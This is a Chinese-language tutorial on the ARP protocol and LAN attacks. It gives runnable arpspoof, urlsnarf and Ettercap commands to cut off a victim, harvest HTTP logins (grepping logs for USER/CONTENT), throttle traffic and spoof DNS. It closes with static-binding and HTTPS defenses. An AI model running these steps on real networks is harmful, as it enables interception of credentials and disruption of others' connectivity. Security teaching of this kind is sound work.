一. ARP协议
1. ARP协议工作原理
什么是ARP
地址解析协议,即ARP(Address Resolution Protocol),是根据IP地址获取物理地址的一个TCP/IP协议
工作原理
ARP协议规定,每台计算机都需要一个ARP表,用来保存IP地址和MAC地址的映射关系,访问IP地址的时候就去查看ARP表,从而找到对应的MAC地址
如果ARP表中匹配不到,就会使用广播的方式发送一个ARP请求,目标主机收到请求后会使用单播的方式返回一个ARP相应,告知自己的MAC地址
拿到MAC地址后,会将映射关系缓存到ARP表,而后传递到数据链路层进行解析转换
2. ARP协议的作用
网路中的数据传输所依赖的是MAC地址而不是IP地址,ARP协议负责将IP协议转换为MAC地址
ARP协议的主要工作就是建立,查询,更新,删除ARP表项
3. ARP常用命令
查询arp表:
arp -a
删除表内某个IP
arp -d IP
tcp抓某块网卡的所有arp请求
tcpdump -i eth0 -nn arp
tcp抓取指定ip的请求
tcpdump -i eth0 -nn arp and host IP
4. ARP工作过程演示
在centos7上通过抓包来了解arp的工作过程
首先查看一下该机器有没有ip:192.168.110.13的mac地址
arp -a 如果存在则先删除掉 arp -d IP
在centos7 上抓包
tcpdump -i eth0 -nn arp 或者 tcpdump -i eth0 -nn arp and host 192.168.110.13
ping一下该IP
ping 192.168.110.13
查看抓包结果
14:25:52.276016 ARP, Request who-has 192.168.25.150 tell 192.168.25.138, length 28 # 请问谁是192.168.25.150 ,请你将你的mac地址告诉给192.168.25.138 14:25:52.276833 ARP, Reply 192.168.25.150 is-at 00:0c:29:8f:60:5a, length 46 # 我是192.168.25.150 ,我的mac地址是 00:0c:29:8f:60:5a 14:25:52.358384 ARP, Request who-has 192.168.25.138 tell 192.168.25.150, length 46 14:25:52.358412 ARP, Reply 192.168.25.138 is-at 00:0c:29:3e:4f:f2, length 28
查看最新的ARP表,看看是否绑定了mac地址
arp -a ? (192.168.25.150) at 00:0c:29:8f:60:5a [ether] on ens33
ARP的请求时一直不间断的在自动发送的,一台计算机会通信进行一下过程
- 主动询问网段下的IP的MAC地址
- 主动告诉别人我的IP和MAC地址
- 根据应答结果实时更新ARP表的绑定关系
5. 总结
- ARP协议负责将IP地址转换为MAC地址,或者说ARP协议负责将IP地址和MAC地址进行绑定
- ARP协议的主要工作就是建立,查询,更新,删除ARP表项
- ARP的特性:无序认为干预,一直在进行轮询和应答
二. ARP断网攻击
1.课前准备
kali 作为ARP攻击机,192.168.110.26 MAC地址:00:0c:29:fc:66:46
win10 作为被攻击方,192.168.110.12 MAC地址:1c:69:7a:a4:cf:92
网关(路由器),192.168.110.1 MAC地址:e4:3a:6e:35:98:00
需要注意的时,两台主机需要在同一个局域网,并且网络通畅。
ping www.mashibing.com
计算上网的过程示意图:
2.arp断网攻击原理
他的原理是:向目标主机不断的发送ARP报文,然后将其报文中的网关Mac地址设置成为攻击机的主机MAC地址,
然后目标主机想要访问网络发送数据包时,都会发送到攻击机,然后攻击机只需要做一个丢弃数据包的
命令,就可以断掉目标主机的网络了。
3.arpspoof介绍:
arpspoof [spuːf] 是一个好用的ARP欺骗工具,攻击者通过毒化受害者ARP缓存,将网关MAC替换为攻击者MAC,然后攻击者可截获受害者发送和收到的数据包,从而获取受害者账户、密码等相关敏感信息。Kali linux中自带了该工具。
命令使用讲解
arpspoof [-i interface] [-c own|host|both] [-t target] [-r] host
-i:指定网卡
-c:攻击机的IP
-t 目标机器的IP
-r:网关IP
4.具体攻击步骤:
1.首先确保两台机器在同一局域网络下,并且可以互相通讯。
1.1查看kali的ip:
ip a
1.2 查看windows的ip:
ipconfig /all
1.3 windows ping kali:
ping 192.168.110.26
1.4 win10 查看arp表,记录网关的信息
arp -a |findstr 192.168.110.1
2.kali进行断网攻击
arpspoof -i eth0 -r 192.168.110.1 -t 192.168.110.12
-i:指定网卡
-r:指定网关ip
-t:指定靶机ip
3.win10 查看网络连接 和 kali 的网络链接
ping www.mashibing.com
4.win10查看此时的arp表
arp -a
或者
arp -a |findstr 192.168.110.1
5.结束断网攻击
ctrl+C
6.win10重新查看网络状态
ping www.mashibing.com
7.win10重新查看arp表
arp -a |findstr 192.168.110.1
5.ARP断网攻击原理深入分析
**1.ARP攻击断网的过程 **
0:c:29:fc:66:46 1c:69:7a:a4:cf:92 0806 42: arp reply 192.168.110.1 is-at 0:c:29:fc:66:46
0:c:29:fc:66:46 e4:3a:6e:35:98:0 0806 42: arp reply 192.168.110.12 is-at 0:c:29:fc:66:46
ARP攻击机器 不停的在告诉 192.168.110.1(网关) 192.168.110.12 的mac地址是 00:0c:29:fc:66:46
ARP攻击机器 不停的在告诉 192.168.110.12(靶机) 192.168.110.1 的mac地址是 00:0c:29:fc:66:46
Ctrl+C停止攻击后
0:c:29:fc:66:46 1c:69:7a:a4:cf:92 0806 42: arp reply 192.168.110.1 is-at e4:3a:6e:35:98:0
0:c:29:fc:66:46 e4:3a:6e:35:98:0 0806 42: arp reply 192.168.110.12 is-at 1c:69:7a:a4:cf:92
ARP攻击机器 重新告诉 192.168.110.12(靶机) 192.168.110.1 的mac地址是 e4:3a:6e:35:98:0
ARP攻击机器 重新告诉 192.168.110.1(网关) 192.168.110.12 的mac地址是 1c:69:7a:a4:cf:92
2.ARP断网原理图:
三. ARP 攻击-流量分析
1. kali数据包转发
出于安全考虑,Linux系统默认是进制数据包转发的,所谓转发即当主机拥有多余一块网卡时,其中一块收到数据包,根据数据包的目的ip地址将数据包发往本机另一块网卡,该网卡根据路由表继续发送数据包.这通常是路由器所要实现的功能,我们需要手动开启转发功能
如何开启通信转发
kali里有个ip_forward配置文件
- 默认是0 禁止端口转发
- 将其设置成1 开启端口转发
开启步骤
查看当前是否开启了端口转发
cat /proc/sys/net/ipv4/ip_forward
开启通信转发的命令
echo 1 >> /proc/sys/net/ipv4/ip_forward
使用arpspoof发起ARP攻击
arpspoof -i eth0 -r 192.168.25.1 -t 192.168.25.138
验证是否转发成功
访问https://www.baidu.com
2. dsniff工具
- 工具介绍
dsniff是一个基于Unix系统网络嗅探工具,工具集包含两个我们需要的两个工具包,arpspoof和urlsnarf
安装方法
apt-get install dsniff
urlsnarf工具介绍
urlsnarf -h urlsnarf [-n] [-i interface | -p pcapfile] [[-v] pattern [expression]] -n 表示不反查主机名 -i interface 网卡接口名 -p pattern 表示对过滤的内容使用的正则表达式 -v表示取相反,即是不匹配;expression 是过滤语法,和tcpdump的相同,请参考tcpdump。
3. url流量分析
概念
URL流量嗅探操作非常类似于中间人攻击,通过目标主机将路由流量注入到因特网,该过程将通过arp注入实现攻击,url嗅探能够实时跟踪电脑中的数据流量信息,并分析出它的类型和去向,从而获得你的上网信息
流量攻击
开启流量转发
echo 1 >> /proc/sys/net/ipv4/ip_forward
开启ARP攻击
arpspoof -i eth0 -r 192.168.25.1 -t 192.168.25.138
捕获目标计算机的url
urlsnarf -i eth0
靶机上网,访问网站
1. http://www.kangda.cn/#/user/login?redirect=http%3A%2F%2Fwww.kangda.cn%2F%23%2F 2. http://blog.tianya.cn/
kali分析用户请求
四. ARP-WireShark截获用户数据
1. WireShark工具介绍
wireshark的官方下载网站: http://www.wireshark.org/
wireshark是非常流行的网络封包分析软件,功能十分强大。可以截取各种网络封包,显示网络封包的详细信息。
wireshark是开源软件,可以放心使用。 可以运行在Windows,linux和Mac OS上。
2. ARP攻击截获密码的步骤
1.开启数据包转发
echo 1 >> /proc/sys/net/ipv4/ip_forward
2.开启ARP攻击
arpspoof -i eth0 -r 192.168.25.1 -t 192.168.25.136
3.启动wireshark
wireshark
4.输入过滤条件
(ip.src==192.168.25.150 or ip.dst==192.168.25.136) and tcp.port==80 and http
5.靶机登录后台系统
http://mng.517628.com/login.php
http://vmims.eguagua.cn/#/Login
6.wireshark寻找用户的登录信息
五. ARP-Ettercap劫持用户流量
一.ettercap 工具介绍
项目官网:http://ettercap.github.io/ettercap/index.html
EtterCap是一个基于ARP地址欺骗方式的网络嗅探工具,主要适用于交换局域网络。借助于EtterCap嗅探软件,渗透测试人员可以检测网络内明文数据通讯的安全性,及时采取措施,避免敏感的用户名/密码等数据以明文的方式进行传输。
ettercap几乎是每个渗透测试人员必备的工具之一。
二.ARP截获用户信息攻击步骤
1.启动ettercap
ettercap -G
2.点击右上角的对勾开始扫描
3.点击左上角查看主机列表
4.选择网关 点击底部的 Add to Target 1
5.选择攻击靶机加入到target2
6.点击右上角攻击菜单,选择ARP攻击
7.点击ok发起攻击
8.查看此时靶机的arp列表
arp -a|findstr 192.168.110.1
9.查看kali的mac地址
ip a
10.靶机登录网站
http://www.kangda.cn/#/user/login?redirect=http%3A%2F%2Fwww.kangda.cn%2F%23%2F
http://vmims.eguagua.cn/#/Login
11.截获用户流量,获取账号密码
12.停止攻击
三.Ettercap 软件功能介绍
1.启动界面
Sniffing at startup :开启嗅探模式
Primary interface :选择网卡
Bridged sniffing :是否开启桥接模式
Bridged interface :桥接模式下的网卡
配置完成后,我们点上方的✔即可完成配置。
2.中间人攻击菜单
ARP poisoning :ARP攻击
DNP poisoning :DNP攻击
ICMP redirect :icmp重定向
Port stealing :端口欺骗
DHCP spoofing :DHCP欺骗
stop MITM :停止攻击
SSL intercept :ssl嗅探
3.更多选项
Targets:攻击列表
Hosts:显示主机列表
Filters:载入二进制脚本
Plugins:插件
Logging:日志
4.hosts选项
Hosts list:扫描到的主机列表
Enable ipv6 scan:扫描ipv6地址
Scan for hosts:扫描主机列表
load hosts form file:从外部文件载入主机列表
Save hosts to file:保存主机列表到文件
5.Targets选项
Current targets:正在攻击的列表
Select targets::选择攻击列表
Portocol:攻击协议
Reverse matching:匹配规则
Wipe targets:擦除攻击
6.View选项
Connections:连接信息
Profiles:IP地址信息
Statistics:统计信息
四.命令行运行Ettercap
1.运行命令讲解
ettercap –i –eth0 –Tq –M arp:remote/ip(host)//net gatemask/ >>b.txt
T:指的是text文本模式
q:指的是安静模式执行这个命令
i:后面跟的是连接局域网的网卡
M:后面跟的是指定使用arp的方式
>>:输出文件
2.攻击命令
ettercap -T -i eth0 -M arp:remote /192.168.110.1// /192.168.110.11//
ettercap -Tq -l a.log -i eth0 -M arp:remote /192.168.110.1// /192.168.110.11//
ettercap -Tq -i eth0 -M arp:remote /192.168.110.1// /192.168.110.11// >>b.txt
3.靶机登录后台网站
http://www.kangda.cn/#/user/login?redirect=http%3A%2F%2Fwww.kangda.cn%2F%23%2F
http://vmims.eguagua.cn/#/Login
4.查看攻击界面日志
tail -f b.txt
停止查看:
CTRL+C
5.过滤无用信息,只查看用户的登录信息
tail -f b.txt | grep "USER"
或者
tail -f b.txt | grep "CONTENT"
或者
tail -f b.txt | egrep "USER|CONTENT"
6.停止ARP攻击
CTRL+C
7.分析日志
cat b.txt
8.筛选用户的登录信息
cat b.txt | grep "USER"
或者
cat b.txt | grep "CONTENT"
或者
cat b.txt | egrep "USER|CONTENT"
9.收集保存用户信息文件
cat -n b.txt | egrep "USER|CONTENT" >arp.log
-n:添加行号
egrep:过滤规则
>:输出文件
六. ARP限制网速攻击
当kali欺骗了网关和受害者的时候,受害者访问网络就需要经过kali的网卡,那我们限制kali网卡的速度或者转发的速度就可以限制对方的网速。这里可以使用的工具有tc、iptables、WonderShaper等等,我们以tc为例,tc是通过限制网卡的速度来限制对方的,是一种杀敌一千自损八百的手段。
1. TC工具介绍
在Linux中,流量控制都是通过TC这个工具来完成的,通常,要对网卡进行流量控制的配置,需要进行如下的步骤:
- 为网卡配置一个队列
- 在该队列上简历分类
- 根据需要建立子队列和子分类
- 为每个分类建立过滤器
需要注意的是,在TC中使用下列的缩写表示相应的网络延迟
时间的计量单位:
s,sec或者secs–>秒
ms,msec或者msecs–>毫秒
us,usec,usecs或者一个无单位数字–>微秒
QDisc(排队规则) [qdɪsk]是queueing discipline [ˈkjuːɪŋ] [ˈdɪsəplɪn] 的简写,它是理解流量控制(traffic control)的基础。无论何时,内核如果需要通过某个网络接口发送数据包,它都需要按照为这个接口配置的qdisc(排队规则)把数据包加入队列。然后,内核会尽可能多地从qdisc里面取出数据包,把它们交给网络适配器驱动模块。
2. TC命令介绍
限制网速200ms延时
tc qdisc add dev eth0 root netem delay 200ms 参数: qdisc: 排队规则 add: 添加 dev: 设备(网卡) root: root用户身份 netem delay: 设置网络延迟时间
取消限制网速200ms延时
tc qdisc del dev eth0 root netem delay 200ms 参数: qdisc:排队规则 del:删除 dev:设备(网卡) root:root用户身份 netem delay:设置网络延时时间
修改网络延时
tc qdisc change dev eth0 root netem delay 300ms 参数: qdisc:排队规则 change:修改 dev:设备(网卡) root:root用户身份 netem delay:设置网络延时时间
3. ARP攻击限制网速的具体步骤
开启端口转发
cat /proc/sys/net/ipv4/ip_forward -->#值为0表示没开启流量转发,为1表示开启了 echo 1 > /proc/sys/net/ipv4/ip_foorward -->#开启流量转发
开启ARP攻击
arpspoof -i eth0 -r 192.168.25.1 -t 192.168.25.51
查看靶机当前网速
https://www.speedtest.cn/
开启网络延迟限速
tc qdisc add dev eth0 root netem delay 500ms
查看限速规则
tc qdisc change dev eth0 root netem delay 800ms
查看靶机当前的网速
https://www.speedtest.cn/
修改网速限制
tc qdisc change dev eth0 root netem delay 800ms
查看限速规则
tc qdisc show
查看靶机当前的网速
https://www.speedtest.cn/
取消限速
tc qdisc del dev eth0 root netem delay 800ms
查看限速规则
tc qdisc show
查看靶机网速
https://www.speedtest.cn/
4. 限速原理图
七. ARP-Ettercap DNS劫持

1. 什么是DNS
DNS是Domain Name System的缩写,我们称之为域名系统,首先它是远程调用服务,本地默认占用53端口,它本身的实质上一个域名和ip的数据库服务器,他要完成的任务是帮我们把输入的域名转换成ip地址,之后通过ip寻址连接目标服务器
2. 工作过程
当访问一个网站时系统将从DNS缓存中读取该域名所对应的IP地址,当查找不到时就会到系统中查找hosts文件,如果还没有才会向DNS服务器请求一个DNS查询,DNS服务器将返回该域名所对应的IP,在你的系统收到解析地址以后将使用该IP地址进行访问,同时将解析缓存到本地的DNS缓存中
2. 什么是DNS劫持
- 概念
DNS劫持又称域名劫持,是指在劫持的网络范围内拦截域名解析的请求,分析请求的域名,把审查范围以外的请求放行,否则返回假的IP地址或者什么都不做使请求失去响应,其效果就是对特定的网络不能访问或访问的是假网址。
- ettercap劫持的原理
局域网劫持,攻击者通过伪装成网关,劫持受害者的网络请求,将网络请求拦截到指定的服务器
DNS常用命令讲解
查看DNS缓存表
ipconfig /displaydns
获取DNS地址
ping www.baidu.com
刷新DNS缓存
ipconfig /flushdns
3. ARP-DNS欺骗攻击步骤
kali开启Apache服务
service apache2 start
浏览器访问Apache首页
http://192.168.25.150
编辑ettercap配置文件
进入配置文件位置
cd /etc/ettercap
备份原有的配置文件
cp etter.dns etter.dns1
设置dns劫持配置文件
vi /etc/ettercap/etter.dns 添加以下内容 * A 192.168.110.12 * PTR 192.168.110.12 wq保存 参数 *:代表所有的网站 也可设置某个网站 www.baidu.com A:代表钓鱼的ip地址 PTR :常被用于反向地址解析
ettercap劫持命令讲解
ettercap -i eth0 -Tq -M arp:remote -P dns_spoof /被攻击者ip// /被攻击者网关// -i: 网卡 -T: 文本模式 -q: 安静模式 -M: 执行mitm攻击 -P: plugin开始该插件
靶机访问以下网站确认环境正常
http://www.baidu.com http://www.jd.com
执行劫持命令
ettercap -i eth0 -Tq -M arp:remote -P dns_spoof /192.168.25.151// /192.168.25.1// >b.txt
分析日志
tail -f b.txt 或者 tail -f b.txt | grep "dns_spoof"
靶机访问网站查看攻击效果
停止劫持
Ctrl+C
恢复dns劫持,刷新dns缓存即可
ipconfig /flushdns
靶机访问网站查看环境是否恢复正常
恢复kali环境
进入配置文件位置
cd /etc/ettercap
复制dns文件到新文件
cp etter.dns etter.dns2
还原dns配置文件
cp etter.dns1 etter.dns
八. ARP攻击防御
1.ARP防御方法简介
ARP攻击的原理是向网关和靶机不停的发送ARP欺骗报文,我们的计算机或者网关就会实时更新ARP缓存表,从而出现安全漏洞。假如对这种欺骗报文的处理是不相信或者不接受的话,就不会出现问题了。处理这种的欺骗的行为我们没办法提前在攻击端进行操作,因为敌人躲在暗处,而我们处明处。
针对这种情况我们可以从以下两方面入手:
1.让我们的电脑不接收欺骗包
2.即使接收到欺骗的包也不要相信
目前网络安全行业现有的ARP防御方案,基本都是基于上面两个方法实现的。
2.windows防御
1.安装arp的防火墙
安装360安全卫士 地址:https://www.360.cn/
2.选择网络安全
3.选择流量防火墙
4.选择局域网防护开启防火墙
5.开启ARP攻击
arpspoof -i eth0 -r 192.168.110.1 -t 192.168.110.24
6.查看防护效果
7.查询本地arp表
arp -a
8.关闭防火墙(退出360安全卫士)
9.查看当前arp表
arp -a
10.停止攻击
ctrl+c
2.设置静态mac地址
1.临时绑定,重启后失去保护效果
1.ARP表MAC地址绑定状态
ARP表MAC地址绑定类型有动态和静态两种。
动态:有时效限制,会实时更新,不安全
静态:长久生效,不会随时间或者通知而变化,安全。
我们来看一下电脑上的ARP表。
arp -a
大部分都是动态的,动态的MAC地址他有生命周期,一定时间之后就会被替换,另外别人通知我更新的时候,也会被直接替换,也就是说无论是被动获取时发现变化了,还是主动被告知时已经变动了,arp列表都会进行更新。如果是攻击方告诉了靶机,他也会相信,从而导致被攻击。我们解决的方法就是把动态的MAC地址变成静态的。那么该如何绑定呢?
2.绑定步骤
1.Win10以管理员身份运行CMD命令提示符
2.查询网关的ip和mac地址
arp -a |findstr 192.168.110.1
网关的IP:192.168.110.1
网关的MAC地址:e4-3a-6e-35-98-00
3.查询本机的网卡
ipconfig
4.查询本地连接的网卡ID号
netsh i i show in
#netsh i i show in 是netsh interface ipv4 show interfaces 的缩写
从图中可以找到,Idx就是网卡的ID,以 Ethernet0也就是我本机的网卡,id=6
5.临时绑定mac地址,重启失效
netsh -c i i add neighbors 6 192.168.110.1 e4-3a-6e-35-98-00 store=active
-c Context 指定上下文
i: interface 更改到 `netsh interface' 上下文。
i:ipv4
add: 在项目列表上添加一个配置项目
neighbors: 添加邻居地址
store=active:设置为临时绑定
查询帮助命令:netsh -c /?
6.发起ARP攻击
arpspoof -i eth0 -r 192.168.110.1 -t 192.168.110.24
7.查询靶机ARP表
arp -a
8.停止ARP攻击
ctrl+c
9.重启靶机,查看arp表
arp -a
10.重新发起ARP攻击
arpspoof -i eth0 -r 192.168.110.1 -t 192.168.110.12
11.查看靶机arp
arp -a
12.停止攻击
ctrl+c
2.永久绑定,重启后不失效
1.绑定命令
netsh -c i i add neighbors 6 192.168.110.1 e4-3a-6e-35-98-00 store=persistent
store=persistent:永久绑定
2.查看ARP表
arp -a
3.发起ARP攻击
arpspoof -i eth0 -r 192.168.110.1 -t 192.168.110.24
4.查看arp缓存表
arp -a
5.重启电脑,查看ARP表
arp -a
6.删除静态配置
arp -d ip #不推荐使用,下次设置时,出现错误
netsh -c i i delete ne 6 #推荐使用
7.查看靶机arp表
arp -a
8.停止攻击
ctrl+c
3.linux防御
1.查询arp表命令
arp -a
ip n
ip neigh
192.168.110.1 dev ens33 lladdr e4:3a:6e:35:98:00 STALE #不新鲜的
192.168.110.1 dev ens33 lladdr e4:3a:6e:35:98:00 REACHABLE #可到达的
2.临时添加静态地址,重启后失效
arp -s 192.168.110.1 e4:3a:6e:35:98:00
3.查询arp表
ip n
192.168.110.1 dev ens33 lladdr e4:3a:6e:35:98:00 PERMANENT #永久的
4.发起ARP攻击
ettercap -T -i eth0 -M arp:remote /192.168.110.1// /192.168.110.26//
5.查看靶机arp表
ip n
6.重启靶机
reboot
7.查看靶机arp表
ip n
8.将其添加到 rc.local里边 开启自动执行
vi /etc/rc.local
chmod +x /etc/rc.d/rc.local
添加:
arp -s 192.168.110.1 e4:3a:6e:35:98:00
wq保存
9.重启centos7
reboot
10.查看arp表
ip n
4.路由/网关防护设置
1.打开路由器配置网站
一般是http://网关ip
2.点击更多功能
3.选择网络设置–局域网
4.添加静态ip地址绑定列表
5.手动添加绑定
5.WEB服务防御ARP攻击
web服务防御明文传输泄露用户信息的手段:使用加密协议:https
1.什么是HTTP
超文本传输协议,是一个基于请求与响应,无状态的,应用层的协议,常基于TCP/IP协议传输数据,互联网上应用最为广泛的一种网络协议,所有的WWW文件都必须遵守这个标准。设计HTTP的初衷是为了提供一种发布和接收HTML页面的方法。使用明文传输,容易被劫持。
2.什么是HTTPS
《图解HTTP》这本书中曾提过HTTPS是身披SSL外壳的HTTP。HTTPS是一种通过计算机网络进行安全通信的传输协议,经由HTTP进行通信,利用SSL/TLS建立全信道,加密数据包。HTTPS使用的主要目的是提供对网站服务器的身份认证,同时保护交换数据的隐私与完整性。使用加密传输,不容易被拦截,更加安全。
TLS是传输层加密协议,前身是SSL协议,由网景公司1995年发布,有时候两者不区分。